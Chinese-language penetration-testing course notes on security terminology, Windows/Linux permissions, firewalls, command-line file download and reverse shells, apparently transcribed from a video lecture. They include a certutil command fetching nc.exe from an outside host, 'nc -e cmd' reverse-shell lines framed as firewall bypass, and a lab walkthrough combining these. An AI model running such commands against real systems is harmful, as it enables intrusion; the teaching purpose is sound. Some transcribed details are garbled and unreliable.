第1天:基础入门-操作系统&名词&文件下载&反弹SHELL&防火墙绕过|小迪安全笔记|网络安全|

第1天:基础入门-操作系统&名词&文件下载&反弹SHELL&防火墙绕过

一、基础入门02:55

1. 知识点03:04

1)名词解释04:06
  • POC与EXP:

    • POCPOCPOC

      (Proof of Concept):概念验证代码,用于证明漏洞存在,通常无害

    • EXPEXPEXP

      (Exploit):漏洞利用代码,用于实际攻击,通常有害

    • 关系:先有POC验证漏洞,再开发EXP进行利用

  • Payload与Shellcode:

    • PayloadPayloadPayload

      :漏洞利用成功后执行的代码/指令,包含权限移交方式和通道

    • ShellcodeShellcodeShellcode

      :Payload的一种,特指建立正向/反向shell的代码

  • 后门与Webshell:

    • 后门:系统隐蔽控制通道的统称

    • WebshellWebshellWebshell

      :专指网站后门,通过web应用执行的恶意脚本

  • 木马与病毒:

    • 木马:以控制目标为主(如灰鸽子、Ghost)
    • 病毒:以破坏系统为主,感染文件使其无法运行
  • 反弹与跳板:

    • 反弹:将权限转移到攻击者控制端
    • 跳板:作为中间节点间接访问目标(如代理服务器)
2)渗透测试常用术语04:26
  • 测试方法:
    • 黑盒测试:无任何目标信息(如代码、架构)
    • 白盒测试:掌握完整目标信息
    • 灰盒测试:介于黑白盒之间
  • 攻击技术:
    • 暴力破解:尝试所有可能组合(如密码爆破)
    • 社会工程学:利用人性弱点(如钓鱼邮件)
    • 撞库:使用泄露的账号密码尝试登录其他平台
  • 专业概念:
    • 肉鸡:被控制的设备(如摄像头组成的僵尸网络)
    • Rootkit:隐蔽的系统级后门工具
    • 蠕虫病毒:自主传播的破坏性程序(如Stuxnet震网)
3)攻击与防御技术14:28
  • 攻击基础设施:
    • 僵尸网络(Botnet):被集中控制的设备集群
    • 网页木马:通过网页漏洞植入恶意代码
    • 挖矿木马:劫持设备算力进行加密货币挖掘
  • 防御要点:
    • 多因素认证:防止凭证爆破
    • 权限最小化:限制账户操作范围
    • 日志监控:检测异常行为模式
4)ATT&CK框架14:44
  • MITRE ATT&CK®
  • 核心价值:
    • 标准化攻击技术命名(如T1537-云服务发现)
    • 提供防御措施参考矩阵
    • 基于真实攻击行为观察
  • 技术分类:
    • 初始访问(9种技术):如钓鱼攻击
    • 权限提升(13种技术):如漏洞利用
    • 横向移动(9种技术):如Pass the Hash
  • 应用场景:
    • 渗透测试报告撰写
    • 红蓝对抗演练
    • 安全产品能力评估
  • 参考资源:

2. 操作系统16:56

1)操作系统用途、命令和权限17:16
  • 操作系统用途
    • 个人计算机与服务器区别:
      • 个人用机:Windows 10等,偏向个人日常使用
      • 服务器用机:Windows Server 2008/2012/2016等,用于架设网站和应用服务
    • 安全测试应用:
      • 识别系统类型可判断渗透目标性质(个人电脑或服务器)
      • 例外情况:少数用户会交叉使用(服务器系统用于个人或反之)
  • 系统命令19:46
    • 命令学习要点
      • 学习原则:
        • 只需了解基础命令存在性
        • 重点掌握查询和使用方法而非死记硬背
      • 主流系统:
        • Windows和Linux占服务器主要份额
        • macOS多用于个人电脑,服务器较少见
    • 命令类型
      • Windows命令:
        • 通过cmd调用命令提示窗
        • PowerShell是新型命令行工具(后续讲解)
      • Linux命令:
        • 包含Ubuntu、CentOS等发行版命令
        • 深度测试常用命令可参考专业备忘表
    • Windows常用命令
      • 系统维护命令:
        • sfc /scannow:Windows文件保护扫描
        • chkdsk.exe:磁盘检查工具
      • 管理工具命令:
        • compmgmt.msc:计算机管理
        • eventvwr:事件查看器
        • regsvr32:DLL注册/注销
    • 文件操作命令21:20
      • 目录操作:
        • DIR:显示目录内容(参数:/S查找子目录,/P分页)
        • MD/MKDIR:创建目录(例:MKDIR HELLOWORLD)
        • CD:切换目录(CD...返回上级,CD\返回根目录)
      • 文件操作:
        • DEL:删除文件
        • COPY:复制文件
        • ATTRIB:修改文件属性
2)文件操作
  • 图形化与命令行关系:图形界面操作都可以通过命令行实现,如创建文件夹、删除文件等基础操作
  • 命令学习方法:
    • 不需要记忆所有命令,使用时查询即可
    • 可通过"命令+功能关键词"在搜索引擎查询(如"linux 显示文件命令")
    • 实际操作中尝试执行验证命令效果
  • Windows常用命令:
    • DIR:列出目录内容,可配合参数使用,如DIR /s查找子目录
    • MD/MKDIR:创建目录,如MKDIR HELLOWORLD
    • CD/CHDIR:切换目录,支持相对路径和绝对路径
    • RD/RMDIR:删除目录,/s参数可删除目录下所有内容
    • COPY:复制文件,如COPY d:\pwin98*.* d:\presetup
    • ATTRIB:修改文件属性,可设置只读®、隐藏(H)等属性
  • Linux命令特点:
    • 与Windows命令功能相似但语法不同
    • 常用基础命令包括cat、more、less、head、tail等文件查看命令
    • 包管理命令如yum(显示已安装包yum list installed)
3)应用案例24:19
  • 例题:操作系统权限应用
    • 权限类型:
      • 文件权限:控制文件能否被读取、修改或删除
      • 用户权限:决定用户可以执行的操作范围
      • 服务权限:限制服务可访问的资源
    • 提权必要性:
      • 当当前权限不足以完成目标操作时需要提权
      • 典型场景包括:
        • 访问受保护的文件内容
        • 修改系统关键配置
        • 安装软件或服务
        • 获取数据库敏感数据
    • 文件权限问题:
      • 基础操作限制:删除、编辑、更改等操作可能被禁止
      • 解决方案:通过权限提升或特殊方法绕过限制
4)文件权限26:06
  • 文件打开与权限问题26:08
    • 权限验证机制:当尝试打开C盘下的test文件时系统提示"没有权限",说明Windows会对用户权限进行实时验证。
    • 权限继承性:即使当前用户创建了文件(如桌面新建文本文档),若后续修改权限设置为拒绝,仍会导致无法访问。
  • 文件保存与权限设置26:23
    • 权限优先级:拒绝权限优先于允许权限,当用户同时被赋予允许和拒绝权限时,系统会优先执行拒绝操作。
    • 权限修改步骤:
      • 右键文件选择"属性"→"安全"选项卡
      • 编辑用户/组的权限条目
      • 勾选"拒绝"列的完全控制选项
      • 应用设置后立即生效
  • 用户与文件权限的关联27:20
    • 用户身份确认:通过whoami命令可查看当前登录用户的完整名称(如输出"xiaodi-pc\xiaodi")。
    • 权限生效原理:当在文件权限设置中拒绝特定用户(如xiaodi)的访问权限后,该用户将无法进行任何文件操作。
    • 权限恢复方法:需要以管理员身份重新编辑权限,取消拒绝选项才能恢复访问。
  • 管理员组与用户权限28:48
    • 用户组机制:
      • Administrators组包含所有管理员账户
      • 用户加入该组即获得管理员权限
    • 权限冲突处理:当用户同时属于多个组时:
      • 若任一组的权限被拒绝,则拒绝生效
      • 需要所有相关组都允许才能正常访问
    • 典型场景:即使用户账户有权限,若所属的Administrators组被拒绝,仍然无法访问文件。
5)计算机管理29:09
  • 用户和组的权限29:12
    • 查看方式:通过计算机管理可以查看当前用户的权限设置,路径为"计算机管理→本地用户和组"。
    • 命令获取:也可以通过命令方式获取本地用户信息,使用"whoami"命令查看当前用户身份。
  • 用户和组的配置29:21
    • 组成员关系:在用户属性中可查看用户所属的组,如Administrators组表示管理员权限。
    • 权限继承:用户会继承所属组的权限设置,组权限变更会影响所有组成员。
  • 权限的继承与影响29:30
    • 组权限优先:即使单独修改用户权限,若组权限设置为拒绝,组成员仍会受限制。
    • 实时生效:权限变更需要点击"应用"按钮才能生效,部分设置需用户重新登录后生效。
  • 提权的概念与原因31:01
    • 提权必要性:当获取的权限不足以完成目标操作时,需要进行权限提升。
    • 限制因素:低权限用户受系统配置限制,无法执行某些敏感操作或访问关键数据。
  • Windows权限等级划分31:37
    • 最高权限:SYSTEM权限,可操作系统核心文件(如删除Windows系统目录)。
    • 管理员权限:Administrator权限,日常使用电脑的标准权限,无法删除系统关键文件。
    • 普通用户:User权限,功能受限,常用于特定服务访问(如科学上网服务器用户)。
    • Linux对比:Linux系统有类似的用户组权限机制,root用户相当于Windows的SYSTEM权限。
    • 权限验证:使用"whoami"命令可查看当前用户身份,确认权限级别。
    • 服务账户:系统会创建特定服务账户(如SQL Server服务账户)用于运行特定服务。
6)防火墙33:32
  • 防火墙与渗透测试的关系33:37
    • 网站测试影响: 默认防火墙策略允许网站协议通讯,导致网站安全测试时防火墙开闭影响不大
    • 内网渗透差异: 内网渗透使用TCP等协议进行横向移动时,防火墙会严格限制这些协议
  • 防火墙策略与网站协议通讯33:55
    • 默认放行规则: 防火墙默认允许ADP协议数据通过,这是网站测试不受限的主要原因
    • 协议决定限制: 防火墙是否限制取决于攻击使用的协议是否在其阻止列表中
  • 出站与入站的概念34:11
    • 出站(除粘): 本地主动向外连接的行为,如访问外部网站
    • 入站(如粘): 外部主动连接本地的行为,如被远程控制
    • 策略差异: 防火墙对出站限制宽松,对入站限制严格
  • Windows防火墙的默认策略34:41
    • 查看方法: 通过"控制面板→系统和安全→Windows Defender防火墙"查看规则
    • 规则标识: 勾选标记表示允许的协议/应用,未勾选表示被阻止
    • 自定义配置: 可手动修改出站/入站规则以允许特定流量
  • 防火墙对内外网攻击的不同影响36:43
    • 外网攻击特点: 主要走网站协议(HTTP/HTTPS),默认被放行
    • 内网攻击特点: 使用TCP/UDP等协议进行横向移动,通常被严格限制
    • 流量方向: 南北向流量(内外通讯)与东西向流量(内网横向)受控程度不同
  • Web应用防火墙(WAF)的介绍39:26
    • 定义: Web Application Firewall,专门防护Web应用的防火墙
    • 与系统防火墙区别:
      • WAF针对应用层(如SQL注入、XSS等攻击)
      • 系统防火墙针对网络层(如端口、协议控制)
    • 常见产品: 安全狗、宝塔、云盾等第三方安全产品
    • 部署方式: 需要额外安装,非系统自带组件
7)文件上传下载40:53
  • 学习目的:解决无图形化环境下的数据传输问题
  • 技术分类:
    • Linux系统:wget/curl命令、Python/Ruby/Perl/Java脚本环境
    • Windows系统:PowerShell/Certutil/Bitsadmin/msiexec/mshta/rundl132等命令
  • 应用场景:
    • 渗透测试时通过webshell或CS/MSF等工具上传攻击脚本
    • 服务器无图形界面时进行文件传输操作
8)无图形化下载问题42:17
  • 核心问题:
    • 操作限制:无法通过图形界面进行拖拽/点击等常规文件操作
    • 权限限制:通常仅提供命令行交互权限
  • 解决方案:
    • 命令记忆技巧:重点掌握常用命令,其他命令可现查资料
    • 传输原理:利用系统自带命令或脚本环境建立数据传输通道
  • 典型场景举例:
    • 上传渗透工具到目标服务器
    • 从受控主机下载敏感数据
    • 在受限环境中部署攻击载荷

3. 攻击篇44:11

1)电子词典44:16
  • 资源网站:推荐forum.ywhack.com网站,该网站包含大部分网络安全学习资料
  • [~]#棱角 ::Edge.Forum*
  • 使用建议:虽然资料不完整,但可作为知识库和工具集使用,需要长期关注积累
2)文件下载44:46
  • 命令生成:网站提供文件下载命令快捷生成功能,包含多种环境下的下载命令
  • 实用工具:支持HTTP Server、Python HTTP、Python FTP等多种下载方式
  • 学习建议:通过长期关注和搜索积累优质资源网站,扩展知识面
3)编码转换44:56
  • 功能支持:提供URL编码、Base64编码、Hex编码、HTML编码等多种编码转换
  • 工具特点:集成多种编码转换功能于一体,方便安全测试使用
4)应用案例45:21
  • 例题:Xshell远程连接
    • 连接特点:Linux服务器采用命令行界面操作,不同于Windows的图形化界面
    • 操作本质:通过输入特定命令实现所需功能
    • 演示内容:展示了使用Xshell工具连接阿里云ECS服务器的完整过程
    • 环境信息:连接的是Ubuntu 16.04.7 LTS系统

二、文件下载命令45:42

1. Linux系统文件下载命令45:52

  • 基础命令:wget和curl是Linux系统自带的文件下载命令,可通过"wget url"或"curl url"格式直接下载文件
  • 多语言支持:除系统命令外,还可使用python、ruby、perl、java等编程语言实现下载功能
  • 重命名参数:使用"-O"参数可指定下载后文件名,如"wget http://example.com/file -O newname"
  • 实际应用:渗透测试时需要将工具下载到目标服务器,需先搭建下载地址(网站或FTP)

2. 文件下载命令生成工具49:36

  • 工具用途:自动生成Windows/Linux系统的文件下载命令
  • 参数配置:
  • 命令类型:
    • PowerShell命令(区分大小写)
    • CMD命令(不区分大小写)
  • 生成示例:

3. 示例:使用PowerShell下载文件50:14

  • 执行过程:
    • 打开PowerShell窗口
    • 粘贴生成的下载命令
    • 查看下载文件的时间戳验证下载成功
  • 注意事项:
    • 需要系统允许执行PowerShell脚本
    • 可能被安全软件拦截
    • 下载目录需要写入权限

4. 示例:使用cmd下载文件51:02

  • 常用命令:
  • 权限问题:
    • 系统目录(如C:\)可能限制写入
    • 建议使用临时目录(如C:\temp)
  • 验证方法:
    • 使用dir命令查看目录内容
    • 检查文件大小是否匹配
    • 确认文件时间戳为下载时间

5. 文件下载权限问题51:56

  • 常见问题:
    • 命令执行成功但文件未出现
    • 可能原因包括目录权限不足、安全软件拦截
  • 解决方案:
    • 切换到有写入权限的目录(如temp)
    • 使用"cd C:\temp"命令切换目录
    • 在权限充足的目录重新执行下载命令
  • 调试技巧:
    • 先尝试创建测试文件确认目录可写
    • 使用绝对路径避免路径错误
    • 检查杀毒软件日志确认是否被拦截

三、反弹Shell命令54:07

1. 反弹Shell的作用

  • 解决数据回显问题:在渗透测试中,很多工具只发送命令不接收返回结果,导致无法确认命令执行情况。反弹Shell可以将执行结果回传给攻击者,例如执行certutil.exe -urlcache -split -f http://www.xiaodi8.com:80/nc.exe exploit.exe时能明确看到"CertUtil: -URLCache 命令成功完成"的反馈。
  • 解决交互式命令问题:像passwd修改密码这类需要用户交互的命令,在Webshell环境下无法正常执行。反弹Shell可以建立完整的交互通道,支持需要用户输入的指令。

2. 反弹Shell的实现方式

  • Linux系统常用工具:
    • wget:文件下载
    • curl:支持多种协议的数据传输
    • python/ruby/perl:脚本语言实现复杂功能
    • java:跨平台应用
  • Windows系统常用工具:
    • PowerShell:强大的脚本环境
    • Certutil:证书工具可用于文件下载
    • Bitsadmin:后台智能传输服务
    • msiexec/mshta/rundll32:系统组件利用

3. 实用案例解析

  • 案例1:无图形化文件传输:
    • 通过命令行工具实现文件上传下载,如使用certutil下载文件:certutil.exe -urlcache -split -f http://www.xiaodi8.com:88/nc.exe c:\exploit.exe
    • 解决没有GUI界面时的数据传输问题
  • 案例2:防火墙绕过策略:
    • 正向连接:攻击者直接连接目标服务
    • 反向连接:目标机主动连接攻击者(更易绕过防火墙)
    • 内网服务器通常采用反向连接方式建立通信

4. 系统权限相关概念

  • 权限分类:
    • 文件权限:控制对文件的读写执行
    • 服务权限:决定服务账户的操作范围
    • 用户权限:用户角色对应的特权级别
  • 用户体系:
    • 系统用户与用户组的划分
    • 服务用户的特殊权限配置
  • 防火墙规则:
    • 出站/入站策略配置
    • 协议类型限制(TCP/UDP等)

四、内外网连接01:00:02

1. 基本概念

  • 外网定义:指公共互联网环境,如阿里云等云服务器,具有全球唯一的IP地址
  • 内网定义:指局域网环境(家庭/学校/企业网络),通过路由器统一出口连接外网,典型如192.168.x.x地址段
  • 网络结构:内网设备通过路由器NAT转换共享同一个公网IP访问外网,类似"多部电话共用总机号码"

2. 连接特性

  • 单向可达性:
    • 内网设备可主动连接外网(知道目标唯一地址)
    • 外网无法直接连接内网设备(内网IP非全局唯一)
  • 通信原理:
    • 数据出站:内网设备→路由器NAT转换→外网目标
    • 数据回传:外网→路由器出口IP→需端口映射才能到达具体内网设备

3. 实验验证

1)NC工具使用
  • 工具介绍:网络瑞士军刀,支持端口测试、数据传输等功能
  • 参数说明:
    • nc -lvvp 577:监听本地577端口
    • nc -e cmd 49.215.577:将本地cmd权限移交至目标IP的577端口
2)连接测试案例
  • 成功案例:
    • 内网虚拟机通过nc -e cmd 小篱笆.com:577成功建立连接
    • 外网服务器显示连接来自路由器公网IP(非内网真实IP)
  • 失败案例:
    • 外网尝试nc -e cmd 内网IP:577连接失败
    • 原因:内网IP在公网不可路由,且路由器未配置端口映射

4. 解决方案

  • 端口映射:
    • 在路由器配置特定端口的转发规则
    • 示例:将公网IP的577端口流量转发至内网192.168.1.100的577端口
  • 应用场景:
    • 远程桌面连接内网主机
    • 内网服务器对外提供服务
    • 需要双向通信的特殊应用

5. 关键结论

  • 本质区别:内网IP可重复(不同局域网可用相同地址段),外网IP必须全局唯一
  • 通信限制:外网主动连接内网必须依赖端口映射/NAT穿透等特殊配置
  • 安全影响:内网设备对外连接会暴露路由器公网IP,但不会暴露内网真实拓扑

五、防火墙实验演示01:15:57

1. 实验环境搭建

  • 主机配置:使用两台外网主机进行测试,分别是米纳斯主机和小李巴达主机
  • 网络工具:使用nc(netcat)工具进行网络连接测试,监听端口为566端口

2. 正常通信测试

  • 连接过程:
    • 主机A监听本地566端口:nc -lvp 566
    • 主机B向主机A发送连接:nc <IP地址> 566
  • 验证方法:成功建立连接后可执行命令,证明双向通信正常

3. 防火墙影响测试

  • 现象观察:
    • 开启Windows防火墙后,连接立即超时失败
    • 关闭防火墙后,连接恢复正常
  • 关键结论:防火墙会阻断未经允许的入站连接

六、正反向连接原理01:21:56

1. 基本概念

  • 防火墙策略:
    • 入站检测严格:对外部主动连接进行严格审查
    • 出站检测宽松:对内部主动外连相对宽松
  • 连接方向判定:需明确以哪台主机为参照基准

2. 正向连接

  • 定义:以渗透主机为基准,主动连接目标主机的行为
  • 特点:
    • 易被防火墙拦截(属于目标主机的入站连接)
    • 示例:攻击机主动连接目标机的566端口

3. 反向连接

  • 定义:让目标主机主动连接渗透主机的行为
  • 特点:
    • 绕过防火墙限制(属于目标主机的出站连接)
    • 示例:在目标机执行nc -e cmd <攻击机IP> 566
  • 优势:利用防火墙出站宽松策略,提高连接成功率

4. 基准参照原则

  • 相对性:正反向判定完全取决于以哪方为基准
    • 以A为基准:A→B为正向
    • 以B为基准:A→B为反向
  • 实战应用:渗透测试中通常以攻击方为基准进行定义

5. 技术实现对比

  • 正向连接命令:nc <目标IP> 566(攻击机执行)
  • 反向连接命令:nc -e cmd <攻击机IP> 566(目标机执行)
  • 版本差异:注意不同版本nc的参数支持情况

七、应用案例01:30:58

1. 例题:服务器渗透

  • 实战演示:通过文件下载和反弹shell两个命令完成真实服务器渗透
  • 靶场说明:使用"皮卡丘"挖宝应用靶场,该靶场存在SQL注入、文件上传、命令执行等多种漏洞
  • 技术要点:
    • 利用命令执行漏洞进行文件下载(nc工具)
    • 通过nc实现反弹shell连接
    • 区分Windows和Linux系统的判断方法(ipconfig/ifconfig命令)
  • 操作步骤:
    • 检测目标是否存在命令执行漏洞
    • 使用文件下载命令将nc工具上传至目标服务器
    • 在攻击机监听端口
    • 在目标服务器执行反弹shell命令
  • 注意事项:
    • 在线靶机存在安全风险,可能被恶意利用
    • 现代靶场多采用容器技术限制权限范围
    • 演示仅用于教学目的,禁止实际攻击行为

八、总结01:40:44

  • 核心知识点:
    • 文件下载类操作
    • 反弹shell技术
    • 系统权限管理
  • 系统分类:
    • 个人主机与服务器主机的区别
    • Windows与Linux系统的命令差异
  • 网络安全要素:
    • 防火墙配置
    • 内外网隔离
    • 正向/反向连接方式
  • 权限管理:
    • 文件权限设置
    • 用户权限控制
    • 运维权限分配
  • 学习建议:
    • 掌握基础命令是前提
    • 思路比具体技术更重要
    • 避免直接攻击在线靶机

九、知识小结

知识点 核心内容 技术要点/易混淆点 难度系数
文件下载 解决无图形化环境下的文件传输问题 WINDOWS/Linux不同命令(weget/curl/powershell) ⭐⭐
反弹Shell 解决数据回显和交互式命令问题 正向/反向连接区别、防火墙策略(入站严格/出站宽松) ⭐⭐⭐
操作系统安全基础 用途/命令/权限/防火墙四维度 服务器vs个人主机区别、system/administrator/user权限层级 ⭐⭐
网络通讯问题 内网与外网连接差异 端口映射原理、NAT环境下数据反弹限制 ⭐⭐⭐⭐
专业名词解释 POC/EXP/木马/病毒等定义 POC(验证)vs EXP(利用)、web shell与系统后门区别
实战案例 通过漏洞利用+文件下载+反弹Shell控制靶机 命令执行漏洞利用、nc工具上传与反弹技巧 ⭐⭐⭐⭐
防火墙绕过 正向/反向连接选择依据 以参照物判断连接方向、出站流量绕过策略 ⭐⭐⭐
社会工程学 利用人为弱点攻击 密码心理学、社工库(泄露数据整合平台) ⭐⭐
相关推荐
用户962377954483 小时前
DVWA 靶场实验报告 (High Level)
安全
数据智能老司机6 小时前
用于进攻性网络安全的智能体 AI——在 n8n 中构建你的第一个 AI 工作流
人工智能·安全·agent
数据智能老司机6 小时前
用于进攻性网络安全的智能体 AI——智能体 AI 入门
人工智能·安全·agent
用户962377954487 小时前
DVWA 靶场实验报告 (Medium Level)
安全
red1giant_star8 小时前
S2-067 漏洞复现:Struts2 S2-067 文件上传路径穿越漏洞
安全
用户9623779544811 小时前
DVWA Weak Session IDs High 的 Cookie dvwaSession 为什么刷新不出来?
安全
cipher2 天前
ERC-4626 通胀攻击:DeFi 金库的"捐款陷阱"
前端·后端·安全
一次旅行5 天前
网络安全总结
安全·web安全
DianSan_ERP5 天前
电商API接口全链路监控:构建坚不可摧的线上运维防线
大数据·运维·网络·人工智能·git·servlet
西岸行者5 天前
学习笔记:SKILLS 能帮助更好的vibe coding
笔记·学习